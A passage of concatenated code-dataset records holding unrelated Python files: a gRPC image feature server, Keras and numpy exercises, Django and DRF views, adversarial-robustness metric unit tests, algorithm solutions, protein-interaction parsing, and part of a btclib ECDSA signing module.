cv2.imdecode(np.fromstring(request.buf, dtype=np.uint8), -1)\n logger.info('Extracting from image of shape ' + str(img.shape))\n img_pil = Image.fromarray(img)\n scene_feature = self.image_model.extract_vec(img_pil, True)\n scene_name = self.image_model.detect(img_pil, True)\n res['features'] = scene_feature.tolist()\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta=scene_name['scene'][0])\n\n return api2msl_pb2.JsonReply(json=json.dumps(res), meta='')\n\n\ndef main():\n # gRPC server configurations\n server = grpc.server(futures.ThreadPoolExecutor(max_workers=8))\n api2msl_pb2_grpc.add_Api2MslServicer_to_server(Api2MslServicer(), server)\n server.add_insecure_port('[::]:50055')\n server.start()\n logger.info('Listening on port 50055')\n try:\n while True:\n time.sleep(_ONE_DAY_IN_SECONDS)\n except KeyboardInterrupt:\n logger.info('Shutting down feature extract model server')\n server.stop(0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"server/model_server/feature_extract_model_server.py","file_name":"feature_extract_model_server.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"389413203","text":"import random\nfrom math import sqrt\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n###\n# Import the boston dataset into separate train/test AND input/result arrays\n# (13+1 columns for every row - 404 rows in train data - 102 rows in test data)\n#\n# x_train:\n# 0: CRIM: Per capita crime rate by town\n# 1: ZN: Proportion of residential land zoned for lots over 25,000 sq. ft\n# 2: INDUS: Proportion of non-retail business acres per town\n# 3: CHAS: Charles River dummy variable (= 1 if tract bounds river; 0 otherwise)\n# 4: NOX: Nitric oxide concentration (parts per 10 million)\n# 5: RM: Average number of rooms per dwelling\n# 6: AGE: Proportion of owner-occupied units built prior to 1940\n# 7: DIS: Weighted distances to five Boston employment centers\n# 8: RAD: Index of accessibility to radial highways\n# 9: TAX: Full-value property tax rate per $10,000\n# 10: PTRATIO: Pupil-teacher ratio by town\n# 11: B: 1000(Bk — 0.63)², where Bk is the proportion of [people of African American descent] by town\n# 12: LSTAT: Percentage of lower status of the population\n#\n# y_train:\n# MEDV: Median value of owner-occupied homes in $1000s\n###\nfrom tensorflow.python.keras._impl.keras.wrappers.scikit_learn import KerasRegressor\n\n(x_train, y_train), (x_test, y_test) = keras.datasets.boston_housing.load_data()\n\n###\n# Describe dataset\n###\nprint(\"The train input is a touple of shape: \" + str(x_train.shape))\nprint(\"The train output is an array of length: \" + str(len(y_train)))\n\nmedian_value_array = y_train\nplt.title(\"Overview of mean value in dataset\")\nplt.xlabel(\"Median value of Home (k$)\")\nplt.ylabel(\"Nr of occurences in test data\")\nplt.hist(median_value_array)\n# plt.show()\n\ncrim_rate = np.array(x_train[:, 0])\n\nplt.title(\"Value/Crime Rate\")\nplt.xlabel(\"Crime Rate (per town capita)\")\nplt.ylabel(\"Median value of Home (k$)\")\nplt.scatter(crim_rate, median_value_array, linestyle='None')\n# plt.show()\n\naverage_number_of_rooms = np.array(x_train[:, 5])\nplt.title(\"Value/Number of rooms\")\nplt.xlabel(\"Average number of rooms\")\nplt.ylabel(\"Median value of Home (k$)\")\nplt.scatter(average_number_of_rooms, median_value_array, linestyle='None')\n# plt.show()\n\nfor x in range(0, 200):\n scale_int = random.randint(0, 100)\n amountOfLayers = 0\n if (scale_int < 50):\n amountOfLayers = 1\n elif (scale_int < 65):\n amountOfLayers = 2\n elif (scale_int < 80):\n amountOfLayers = 3\n elif (scale_int < 90):\n amountOfLayers = 4\n layerToAdd = 1\n ###\n # Initiate Model\n ###\n layer_sizes=[random.randint(6,13) for _ in range(amountOfLayers+1)]\n model = keras.Sequential()\n model.add(keras.layers.Dense(layer_sizes[0], activation=tf.nn.relu, kernel_initializer='normal', input_shape=(13,)))\n # model.add(keras.layers.Dropout(0.2)) # Not Overfitting data\n while (layerToAdd <= amountOfLayers):\n layerToAdd = layerToAdd + 1\n model.add(keras.layers.Dense(layer_sizes[1], kernel_initializer='normal', activation=tf.nn.relu))\n # model.add(keras.layers.Dense(20, kernel_initializer='normal', activation=tf.nn.relu))\n # model.add(keras.layers.Dense(4, kernel_initializer='normal', activation='relu'))\n model.add(keras.layers.Dense(1, kernel_initializer='normal'))\n model.compile(optimizer=tf.train.AdamOptimizer(),\n loss='mean_squared_error')\n\n ###\n # Train Model\n # (Fit model to training data set)\n ###\n model.fit(x_train, y_train, epochs=500, verbose=0)\n\n ###\n # Test Model\n # (get mean squared error of test data in k$)\n ###\n mean_squared_error = model.evaluate(x_test, y_test, verbose=0)\n # mean_squared_error = model.evaluate(x_train, y_train)\n # scores = model.evaluate(x_train, y_train)\n if (mean_squared_error < 200):\n print(str(x) + \":\"+str(amountOfLayers)+\" error: \" + str(round(sqrt(mean_squared_error), 2)) + \"k$ \" + str(layer_sizes))\n # pass\n # print(str(x)+\": Mean squared error on test data: \"+str(round(mean_squared_error,2))+\"k$\")\n","sub_path":"miniProject3_loop.py","file_name":"miniProject3_loop.py","file_ext":"py","file_size_in_byte":4052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"109712334","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'skurcz_to'\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('shorten/', views.shorten_long_url, name='shorten_url'),\n path('/', views.obtain_long_url, name='get_url'),\n]\n","sub_path":"skurcz/skurcz_to/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"392249411","text":"import numpy as np\n#list_of_lists = [[1,4,1],[1,3,1],[2,2,2]] \n#data = np.array(list_of_lists)\n\n#add row only and for column axis =0\n# sum = data.sum(axis=0)\n#sum = data.sum()\n#print(sum)\n\n#can direct add and do other mathematics treat as elemenet\n#add_by_1 = data + 1\n#print(add_by_1)\n\n#shape\n#print(data.shape)\n#print(type(data))\n\n#slicing in np array\n#print(data[:,:-2])\n\n\n#random \n# sale_of_coffee = np.random.randint(20,100,size=(4,7)) #generate random value from (start,end)\n# print(sale_of_coffee)\n# print(sale_of_coffee.argmax()) #return index that have high value \n# print(sale_of_coffee.max())\n\nlist_a = [[1,2,1],[2,22,2]]\nlist_b = [[2,6,2],[2,21,2]]\na = np.array(list_a)\nb = np.array(list_b)\nprint(a)\nprint(b)\nprint(a+b)\n","sub_path":"Numpy/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"477985515","text":"from __future__ import absolute_import, division, print_function, unicode_literals\n\nimport unittest\n\nimport keras.backend as k\nimport tensorflow as tf\nimport numpy as np\n\nfrom art.classifiers.cnn import CNN\nfrom art.metrics import empirical_robustness\nfrom art.utils import load_mnist, load_cifar10\nfrom art.metrics import clever_t, clever_u\nfrom art.classifiers.classifier import Classifier\n\nBATCH_SIZE = 10\nNB_TRAIN = 100\nNB_TEST = 100\n\n\nclass TestMinimalPerturbation(unittest.TestCase):\n # def test_cifar(self):\n # session = tf.Session()\n # K.set_session(session)\n #\n # # get CIFAR10\n # (X_train, Y_train), (X_test, Y_test), _, _ = load_cifar10()\n # X_train, Y_train, X_test, Y_test = X_train[:NB_TRAIN], Y_train[:NB_TRAIN], X_test[:NB_TEST], Y_test[:NB_TEST]\n # im_shape = X_train[0].shape\n #\n # # Get the classifier\n # classifier = CNN(im_shape, act='relu')\n # classifier.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n # classifier.fit(X_train, Y_train, epochs=1, batch_size=BATCH_SIZE)\n #\n # scores = classifier.evaluate(X_test, Y_test)\n # print(\"\\naccuracy: %.2f%%\" % (scores[1] * 100))\n\n def test_emp_robustness_mnist(self):\n session = tf.Session()\n k.set_session(session)\n\n comp_params = {\"loss\": 'categorical_crossentropy',\n \"optimizer\": 'adam',\n \"metrics\": ['accuracy']}\n\n # get MNIST\n (X_train, Y_train), (_, _), _, _ = load_mnist()\n X_train, Y_train = X_train[:NB_TRAIN], Y_train[:NB_TRAIN]\n im_shape = X_train[0].shape\n\n # Get classifier\n classifier = CNN(im_shape, act=\"relu\")\n classifier.compile(comp_params)\n classifier.fit(X_train, Y_train, epochs=1, batch_size=BATCH_SIZE)\n\n # Compute minimal perturbations\n params = {\"eps_step\": 1.1,\n \"clip_min\": 0.,\n \"clip_max\": 1.}\n\n emp_robust = empirical_robustness(X_train, classifier, session, \"fgsm\", params)\n self.assertEqual(emp_robust, 0.)\n\n params = {\"eps_step\": 1.,\n \"eps_max\": 1.,\n \"clip_min\": None,\n \"clip_max\": None}\n emp_robust = empirical_robustness(X_train, classifier, session, \"fgsm\", params)\n self.assertAlmostEqual(emp_robust, 1., 3)\n\n params = {\"eps_step\": 0.1,\n \"eps_max\": 0.2,\n \"clip_min\": None,\n \"clip_max\": None}\n emp_robust = empirical_robustness(X_train, classifier, session, \"fgsm\", params)\n self.assertLessEqual(emp_robust, 0.2)\n\n # params = {\"theta\": 1.,\n # \"gamma\": 0.01,\n # \"clip_min\": 0.,\n # \"clip_max\": 1.}\n # emp_robust_jsma = empirical_robustness(X_train, classifier, session, \"jsma\", params)\n # self.assertLessEqual(emp_robust_jsma, 1.)\n\n\n#########################################\n# This part is the unit test for Clever.#\n#########################################\n\nclass TestClassifier(Classifier):\n def __init__(self, defences=None, preproc=None):\n from keras.models import Sequential\n from keras.layers import Lambda\n model = Sequential(name=\"TestClassifier\")\n model.add(Lambda(lambda x: x + 0, input_shape=(2,)))\n\n super(TestClassifier, self).__init__(model, defences, preproc)\n\n\nclass TestClever(unittest.TestCase):\n \"\"\"\n Unittest for Clever metrics.\n \"\"\"\n def test_clever_t_unit(self):\n \"\"\"\n Test the targeted version with simplified data.\n :return:\n \"\"\"\n print(\"Unit test for the targeted version with simplified data.\")\n # Define session & params\n session = tf.Session()\n k.set_session(session)\n\n # Get classifier\n classifier = TestClassifier()\n\n # Compute scores\n res = clever_t(np.array([1, 0]), classifier, 1, 20, 10, 1, session)\n\n # Test\n self.assertAlmostEqual(res[0], 0.9999999999999998, delta=0.00001)\n self.assertAlmostEqual(res[1], 0.7071067811865474, delta=0.00001)\n self.assertAlmostEqual(res[2], 0.4999999999999999, delta=0.00001)\n\n def test_clever_u_unit(self):\n \"\"\"\n Test the untargeted version with simplified data.\n :return:\n \"\"\"\n print(\"Unit test for the untargeted version with simplified data.\")\n # Define session & params\n session = tf.Session()\n k.set_session(session)\n\n # Get classifier\n classifier = TestClassifier()\n\n # Compute scores\n res = clever_u(np.array([1, 0]), classifier, 20, 10, 1, session)\n\n # Test\n self.assertAlmostEqual(res[0], 0.9999999999999998, delta=0.00001)\n self.assertAlmostEqual(res[1], 0.7071067811865474, delta=0.00001)\n self.assertAlmostEqual(res[2], 0.4999999999999999, delta=0.00001)\n\n def test_clever_t(self):\n \"\"\"\n Test the targeted version.\n :return:\n \"\"\"\n print(\"Test if the targeted version works on a true classifier/data\")\n # Define session & params\n session = tf.Session()\n k.set_session(session)\n\n comp_params = {\"loss\": 'categorical_crossentropy', \"optimizer\": 'adam',\n \"metrics\": ['accuracy']}\n\n # Get MNIST\n (X_train, Y_train), (_, _), _, _ = load_mnist()\n X_train, Y_train = X_train[:NB_TRAIN], Y_train[:NB_TRAIN]\n im_shape = X_train[0].shape\n\n # Get classifier\n classifier = CNN(im_shape, act=\"relu\")\n classifier.compile(comp_params)\n classifier.fit(X_train, Y_train, epochs=1,\n batch_size=BATCH_SIZE, verbose=0)\n\n res = clever_t(X_train[-1], classifier, 7, 20, 10, 5, session)\n self.assertGreater(res[0], res[1])\n self.assertGreater(res[1], res[2])\n\n def test_clever_u(self):\n \"\"\"\n Test the untargeted version.\n :return:\n \"\"\"\n print(\"Test if the untargeted version works on a true classifier/data\")\n # Define session & params\n session = tf.Session()\n k.set_session(session)\n\n comp_params = {\"loss\": 'categorical_crossentropy', \"optimizer\": 'adam',\n \"metrics\": ['accuracy']}\n\n # Get MNIST\n (X_train, Y_train), (_, _), _, _ = load_mnist()\n X_train, Y_train = X_train[:NB_TRAIN], Y_train[:NB_TRAIN]\n im_shape = X_train[0].shape\n\n # Get classifier\n classifier = CNN(im_shape, act=\"relu\")\n classifier.compile(comp_params)\n classifier.fit(X_train, Y_train, epochs=1,\n batch_size=BATCH_SIZE, verbose=0)\n\n res = clever_u(X_train[-1], classifier, 2, 10, 5, session)\n self.assertGreater(res[0], res[1])\n self.assertGreater(res[1], res[2])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"art/metrics_unittest.py","file_name":"metrics_unittest.py","file_ext":"py","file_size_in_byte":6929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"528506715","text":"# 实现 Trie (前缀树)\nclass Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root= TrieNode()\n\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n node = self.root\n for w in word:\n node = node.children[w]\n node.is_end = True\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n node = self.root\n for w in word:\n if w in node.children:\n node = node.children[w]\n else:\n return False\n return node.is_end\n\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n node = self.root\n for w in prefix:\n if w in node.children:\n node = node.children[w]\n else:\n return False\n return True\n\nclass TrieNode:\n def __init__(self):\n self.children = defaultdict(TrieNode)\n self.is_end = False\n\n\n# 单词搜索 II\n\nclass Solution:\n def findWords(self, board: List[List[str]], words: List[str]) -> List[str]:\n trie = {}\n for word in words:\n node = trie\n for char in word:\n node = node.setdefault(char, {})\n node['#'] = True\n\n def search(i, j, node, prefix, visited):\n if '#' in node:\n result.add(prefix)\n del node['#']\n visited.add((i,j))\n for (di, dj) in ((-1, 0), (1, 0), (0, -1), (0, 1)):\n the_i,the_j = i+di,j+dj\n if -1 < the_i < h and -1 < the_j < w and board[the_i][the_j] in node and (the_i, the_j) not in visited:\n search(the_i, the_j, node[board[the_i][the_j]], prefix+board[the_i][the_j], visited)\n if not node[board[the_i][the_j]]:\n del node[board[the_i][the_j]]\n visited.remove((i,j))\n\n\n result, h, w,visited = set(), len(board), len(board[0]),set\n for i in range(h):\n for j in range(w):\n if board[i][j] in trie:\n search(i, j, trie[board[i][j]], board[i][j], visited)\n if not trie[board[i][j]]:del trie[board[i][j]]\n return list(result)\n\n\n\n\n\n\n\n\n\n\n# N皇后\n\nclass Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n result = []\n cheseboard = [['.'] * n for _ in range(n)]\n\n def backtracking(n, row, cheseboard):\n if row == n:\n temp_res = []\n for temp in cheseboard:\n temp_str = \"\".join(temp)\n temp_res.append(temp_str)\n result.append(temp_res)\n return\n for col in range(n):\n if isValid(row, col, cheseboard):\n cheseboard[row][col] = \"Q\"\n backtracking(n, row + 1, cheseboard)\n cheseboard[row][col] = \".\"\n\n def isValid(row, col, cheseboard):\n for i in range(len(cheseboard)):\n if cheseboard[i][col] == 'Q':\n return False\n\n i = row - 1\n j = col - 1\n while i >= 0 and j >= 0:\n if cheseboard[i][j] == 'Q':\n return False\n i -= 1\n j -= 1\n\n i = row - 1\n j = col + 1\n while i >= 0 and j < len(cheseboard):\n if cheseboard[i][j] == 'Q':\n return False\n i -= 1\n j += 1\n return True\n\n backtracking(n, 0, cheseboard)\n return result","sub_path":"Week_07/zuoye.py","file_name":"zuoye.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"307627859","text":"# Write your code here for Part 1. You are welcome to add more cells.\nimport os, re\n\n\n# print(os.path.exists(\"bc2_ips_pmid2ppi_train.txt\")) #Will print \"False\" if the file is not uploaded by first running the above cell.\n\ndef load_interactions(file_name):\n print(os.path.exists(file_name)) # Will print \"False\" if the file is not uploaded by first running the above cell.\n data = list(uploaded.values())[0].decode('utf-8') # decode from bytes to string\n # int_id = re.findall(\"\\n([A-Z0-9]+)\\t\", data)\n # print(int_id)\n proteins_1 = re.findall(\"\\t([A-Z0-9]+)\\t\", data) # captures all the 'first' protein that appear in an interaction\n proteins_2 = re.findall(\"([A-Z0-9]+)\\n+\", data) # captures all the 'second' protein that appear in an interaction\n interaction_list = list()\n\n for i in range(len(proteins_1)): # Iterate through the proteins\n interaction_list.append((proteins_1[i], proteins_2[i])) # Append the tuple of proteins to a list\n return interaction_list # Returns a list of tuples\n\n\ninteractions2 = load_interactions('bc2_ips_pmid2ppi_train.txt')\n\n\ndef interact(interactions, id1, id2):\n for tuple_proteins in interactions: # Iterate through each tuple\n if id1 in tuple_proteins and id2 in tuple_proteins: # check if both id1 AND id2 are in the same tuple; True\n return True\n return False # else false\n\n\nprotein1 = 'YPL094C'\nprotein2 = 'YPR086W'\n\n\n# test = 'O88643'\n# print(interact(interactions2, 'YPL094C', 'YPR086W'))\n# print(interact(interactions2, 'YPR086W', 'YPL094C'))\n\n\ndef get_interactions(interactions, id_name):\n interacted = list() # list to hold potential proteins that interact with id_name\n\n for tuple_proteins in interactions: # Iterate through each tuple\n\n id1 = tuple_proteins[0] # Set variable to first element in tuple\n id2 = tuple_proteins[1] # Set variable to second element in tuple\n\n if id_name == id1: # check if given id is in tuple; True, add id2 to list\n interacted.append(id2)\n elif id_name == id2: # check if given id is in tuple; True, add id1 to list\n interacted.append(id1)\n return interacted # Returns a list of interacted proteins\n\n\n# print(get_interactions(interactions2, 'Q14790'))\n\n\ndef average_interactions(interactions):\n protein_appearance = {} # a dictionary structured as; protein: occurances\n total_occurances = 0 # documents ALL protein occurances\n for tuple_proteins in interactions: # iterate through data\n for protein in tuple_proteins: # iterate through proteins in the tuples\n if protein in protein_appearance.keys(): # check whether the protein is in dictionary\n continue # next protein\n else:\n # print(protein)\n total_occurances = total_occurances + len(\n get_interactions(interactions, protein)) # total all the occurances\n protein_appearance[protein] = len(get_interactions(interactions, protein)) #\n for k, v in protein_appearance.items():\n pass\n # print(\" { \", k, \" \" , v ,\"} \" )\n # print(\"total occurance \", total_occurances, \" uniq_ids = \" ,len(protein_appearance.keys()) )\n # print(total_occurances/len(protein_appearance.keys()))\n return total_occurances / len(protein_appearance.keys())\n\n\naverage_interactions(interactions2)","sub_path":"program-2-python/naive-bayes/naiive-bayes.py","file_name":"naiive-bayes.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"522246946","text":"# Create your views here.\nfrom django.http import HttpResponse\nfrom article.models import Article,Comment\nfrom django.template.loader import get_template #for tempaltes\nfrom django.template import Context #for templates\nfrom django.views.generic.base import TemplateView #for class based view\nfrom django.shortcuts import render_to_response\nfrom forms import ArticleForm, CommentForm #importing ArticleForm from forms.py\nfrom django.http import HttpResponseRedirect\nfrom django.core.context_processors import csrf\nfrom django.utils import timezone #for knowing time on server\n\n#example lecture4\n#def hello(request):\n# name=\"rajat\"\n# html=\"Hi %s u r on right path!!\" %name\n# return HttpResponse(html)\n \n#def hello_template(request):\n# name=\"rajat\"\n# t=get_template('hello.html')\n# html=t.render(Context({'name':name}))\n# return HttpResponse(html)\n \n#def hello_simple(request):\n# name=\"rajat\"\n# return render_to_response('hello.html',{'name':name}) #this finction is does same thing as above function but its simple\n\n#class HelloTemplate(TemplateView):\n# template_name='hello_class.html'\n \n# def get_context_data(self, **kwargs):\n# context=super(HelloTemplate, self).get_context_data(**kwargs)\n# context['name']='rajat'\n# context['frame']='django'\n# return context\n\ndef articles(request):\n language='en-gb' #for cookies\n session_language='en-gb' #for session\n if 'lang' in request.COOKIES:\n language=request.COOKIES['lang'] #if language is available in cookies use that to set language and dont use default set above\n if 'lang' in request.session:\n session_language=request.session['lang']\n args={}\n args.update(csrf(request))\n args['articles']=Article.objects.all()\n args['language']=language\n args['session_language']=session_language\n return render_to_response('articles.html',args) #getting all objects of Article consider it as table\n \ndef article(request, article_id=1):\n return render_to_response('article.html',{'article':Article.objects.get(id=article_id)})\n \ndef language(request, language='en-gb'):\n response=HttpResponse(\"language set to %s consider going back to page now\" % language)\n response.set_cookie('lang',language) #using set_cookie method of response object to set language\n request.session['lang']=language #session use request\n return response\n \ndef create(request):\n if request.POST:\n form=ArticleForm(request.POST, request.FILES) #if post got any info, request.files will get if there is any file uploaded\n if form.is_valid():\n form.save()\n return HttpResponseRedirect('/articles/all')\n else:\n form=ArticleForm() #blankform\n args={}\n args.update(csrf(request)) #building form securely\n args['form']=form #pop the form to be renderd in template\n return render_to_response('create_article.html', args)\n \ndef like_article(request, article_id):\n if article_id:\n a=Article.objects.get(id=article_id) #fetching the required article\n a.likes += 1\n a.save() #update number of likes for that article\n return HttpResponseRedirect('/articles/get/%s' % article_id) #redirecting it to same article of which like is clicked to show new num of likes\n #try doing this like allowing given login id to like only once\n\n \ndef add_comment(request, article_id):\n a=Article.objects.get(id=article_id) #loading the article so that comment could be saved on correct article\n if request.method=='POST':\n f=CommentForm(request.POST) #create commentform using POST\n if f.is_valid():\n c=f.save(commit=False) #save form but dont push it to database,this returns instance of comment in c\n c.pub_date=timezone.now() #setting pub_date for comment using current time of server\n c.article=a #setting article field for comment to which comment is linked to\n c.save()\n return HttpResponseRedirect('/articles/get/%s' % article_id) \n else:\n f=CommentForm() #displaying blank form\n args={}\n args.update(csrf(request)) #building form securely\n args['article']=a\n args['form']=f\n return render_to_response('add_comment.html', args)\n \ndef search_titles(request):\n if request.method=='POST':\n search_text=request.POST['search_text'] #search_text in POST distionary and pass it to variable search_text\n else:\n search_text=''\n articles=Article.objects.filter(title__contains=search_text) #filter title where it conatins search text in title\n return render_to_response('ajax_search.html', {'articles':articles})\n \n \n \n \n ","sub_path":"article/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"156626669","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.permissions import IsAdminUser\n\nfrom datetime import date, timedelta\n\nfrom meiduo_admin.serializers.increment import GoodsVisitCountSerializer\nfrom users.models import User\nfrom goods.models import GoodsVisitCount\n\n\nclass IncrementTotalcountView(APIView):\n \"\"\"\n 注册用户总量统计\n \"\"\"\n # 指定权限\n permission_classes = [IsAdminUser]\n\n def get(self, request):\n # 1、查询注册用户总量\n count = User.objects.all().count()\n\n # 2、获取当前日期\n now_date = date.today()\n\n # 3、返回结果\n return Response({\n 'count': count,\n 'date': now_date\n })\n\n\nclass IncrementDayCountView(APIView):\n \"\"\"\n 获取当天注册用户总量统计\n \"\"\"\n # 指定权限\n permission_classes = [IsAdminUser]\n\n def get(self, request):\n # 1、获取当前日期\n now_date = date.today()\n # 2、查询当天注册用户总量\n count = User.objects.filter(date_joined__gte=now_date).count()\n # 3、返回结果\n return Response({\n 'count': count,\n 'date': now_date\n })\n\n\nclass IncrementDayActiveView(APIView):\n \"\"\"\n 获取当天登录用户总量统计\n \"\"\"\n # 指定权限\n permission_classes = [IsAdminUser]\n\n def get(self, request):\n # 1、获取当前日期\n now_date = date.today()\n # 2、查询当天登录用户总量\n count = User.objects.filter(last_login__gte=now_date).count()\n # 3、返回结果\n return Response({\n 'count': count,\n 'date': now_date\n })\n\n\nclass IncrementDayOrderView(APIView):\n \"\"\"\n 获取当天下单用户总量统计\n \"\"\"\n # 指定权限\n permission_classes = [IsAdminUser]\n\n def get(self, request):\n # 1、获取当前日期\n now_date = date.today()\n # 2、查询当天登录用户总量\n count = User.objects.filter(orders__create_time__gte=now_date).count()\n # 3、返回结果\n return Response({\n 'count': count,\n 'date': now_date\n })\n\n\nclass IncrementMonthCountView(APIView):\n \"\"\"\n 获取单月每天注册用户数量统计\n \"\"\"\n # 指定权限\n permission_classes = [IsAdminUser]\n\n def get(self, request):\n # 1、获取当前日期\n now_date = date.today()\n # 2、获取一个月前的日期\n start_date = now_date - timedelta(days=29)\n\n # 构建列表数据\n data_list = []\n for i in range(30):\n # 获取起始时间\n index_date = start_date + timedelta(days=i)\n # 获取第二天实现\n next_date = index_date + timedelta(days=1)\n count = User.objects.filter(date_joined__gte=index_date, date_joined__lt=next_date).count()\n data_list.append({'count': count, 'date': index_date})\n # 3、返回结果\n return Response(data_list)\n\n\nclass GoodsVisitCountView(APIView):\n \"\"\"\n 获取当天分类数量统计\n \"\"\"\n # 指定权限\n permission_classes = [IsAdminUser]\n\n def get(self, request):\n # 1、获取当前日期\n now_date = date.today()\n # 2、查询当天登录用户总量\n goodvisit = GoodsVisitCount.objects.filter(date__gte=now_date)\n # 3、返回结果\n ser = GoodsVisitCountSerializer(goodvisit, many=True)\n return Response(ser.data)\n","sub_path":"meiduo_mall/apps/meiduo_admin/views/increments.py","file_name":"increments.py","file_ext":"py","file_size_in_byte":3578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"446221367","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2020 The btclib developers\n#\n# This file is part of btclib. It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\n\"\"\"Elliptic Curve Digital Signature Algorithm (ECDSA).\n\n Implementation according to SEC 1 v.2:\n\n http://www.secg.org/sec1-v2.pdf\n\n specialized with bitcoin canonical 'low-s' encoding.\n\"\"\"\n\nimport secrets\nfrom hashlib import sha256\nfrom typing import List, Optional, Tuple\n\nfrom . import der\nfrom .alias import DSASig, DSASigTuple, HashF, JacPoint, Octets, Point, String\nfrom .curve import Curve, secp256k1\nfrom .curvegroup import _double_mult, _mult\nfrom .exceptions import BTClibRuntimeError, BTClibValueError\nfrom .hashes import reduce_to_hlen\nfrom .numbertheory import mod_inv\nfrom .rfc6979 import __rfc6979\nfrom .to_prvkey import PrvKey, int_from_prvkey\nfrom .to_pubkey import Key, point_from_key\nfrom .utils import bytes_from_octets, int_from_bits\n\n# _validate_sig, deserialize and serialize are basically just wrappers\n# for the equivalent functions in the der module\n\n\ndef _validate_sig(r: int, s: int, ec: Curve = secp256k1) -> None:\n return der._validate_sig(r, s, None, ec)\n\n\ndef deserialize(sig: DSASig, ec: Curve = secp256k1) -> DSASigTuple:\n \"\"\"Return the verified components of the provided ECDSA signature.\n\n The ECDSA signature can be represented as (r, s) tuple or\n as strict ASN.1 DER binary representation.\n \"\"\"\n\n if not isinstance(sig, tuple):\n return der.deserialize(sig, ec)[0:2]\n\n r, s = sig\n _validate_sig(*sig, ec)\n return r, s\n\n\ndef serialize(r: int, s: int, ec: Curve = secp256k1) -> bytes:\n \"Return the ECDSA signature as strict ASN.1 DER representation.\"\n\n return der.serialize(r, s, None, ec)\n\n\ndef gen_keys(prvkey: PrvKey = None, ec: Curve = secp256k1) -> Tuple[int, Point]:\n \"Return a private/public (int, Point) key-pair.\"\n\n if prvkey is None:\n # q in the range [1, ec.n-1]\n q = 1 + secrets.randbelow(ec.n - 1)\n else:\n q = int_from_prvkey(prvkey, ec)\n\n QJ = _mult(q, ec.GJ, ec)\n Q = ec._aff_from_jac(QJ)\n # q.to_bytes(ec.nsize, 'big')\n # bytes_from_point(Q, ec, compressed)\n return q, Q\n\n\ndef _challenge(m: Octets, ec: Curve = secp256k1, hf: HashF = sha256) -> int:\n\n # The message m: a hlen array\n hlen = hf().digest_size\n m = bytes_from_octets(m, hlen)\n\n # leftmost ec.nlen bits %= ec.n\n c = int_from_bits(m, ec.nlen) % ec.n # 5\n return c\n\n\ndef challenge(msg: String, ec: Curve = secp256k1, hf: HashF = sha256) -> int:\n\n m = reduce_to_hlen(msg, hf)\n return _challenge(m, ec, hf)\n\n\ndef __sign(c: int, q: int, k: int, low_s: bool, ec: Curve) -> DSASigTuple:\n # Private function for testing purposes: it allows to explore all\n # possible value of the challenge c (for low-cardinality curves).\n # It assume that c is in [0, n-1], while q and k are in [1, n-1]\n\n # Steps numbering follows SEC 1 v.2 section 4.1.3\n\n KJ = _mult(k, ec.GJ, ec) # 1\n\n # affine x_K-coordinate of K (field element)\n x_K = (KJ[0] * mod_inv(KJ[2] * KJ[2], ec.p)) % ec.p\n # mod n makes it a scalar\n r = x_K % ec.n # 2, 3\n if r == 0: # r≠0 required as it multiplies the public key\n raise BTClibRuntimeError(\"failed to sign: r = 0\")\n\n s = mod_inv(k, ec.n) * (c + r * q) % ec.n # 6\n if s == 0: # s≠0 required as verify will need the inverse of s\n raise BTClibRuntimeError(\"failed to sign: s = 0\")\n\n # bitcoin canonical 'low-s' encoding for ECDSA signatures\n # it removes signature malleability as cause of transaction malleability\n # see https://github.com/bitcoin/bitcoin/pull/6769\n # TODO optional low_s\n if low_s and s > ec.n / 2:\n s = ec.n - s # s = - s % ec.n\n\n return r, s\n\n\ndef _sign(\n m: Octets,\n prvkey: PrvKey,\n k: Optional[PrvKey] = None,\n low_s: bool = True,\n ec: Curve = secp256k1,\n hf: HashF = sha256,\n) -> DSASigTuple:\n \"\"\"Sign a hlen bytes message according to ECDSA signature algorithm.\n\n If the deterministic nonce is not provided,\n the RFC6979 specification is used.\n \"\"\"\n\n # the message m: a hlen array\n hlen = hf().digest_size\n m = bytes_from_octets(m, hlen)\n\n # the secret key q: an integer in the range 1..n-1.\n # SEC 1 v.2 section 3.2.1\n q = int_from_prvkey(prvkey, ec)\n\n # the challenge\n c = _challenge(m, ec, hf) # 4, 5\n\n # the nonce k: an integer in the range 1..n-1.\n if k is None:\n k = __rfc6979(c, q, 